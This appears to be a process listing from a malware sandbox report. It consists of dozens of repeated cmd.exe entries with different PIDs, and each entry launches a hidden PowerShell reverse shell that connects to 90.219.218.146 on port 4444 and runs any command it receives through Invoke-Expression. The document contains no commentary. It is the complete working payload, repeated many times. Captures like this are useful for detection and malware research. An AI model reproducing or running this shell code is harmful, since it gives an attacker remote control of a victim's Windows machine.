C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4452
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3308
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4880
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3768
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3480
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:264
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2352
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4516
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5088
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4124
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1756
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3200
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1208
-
-
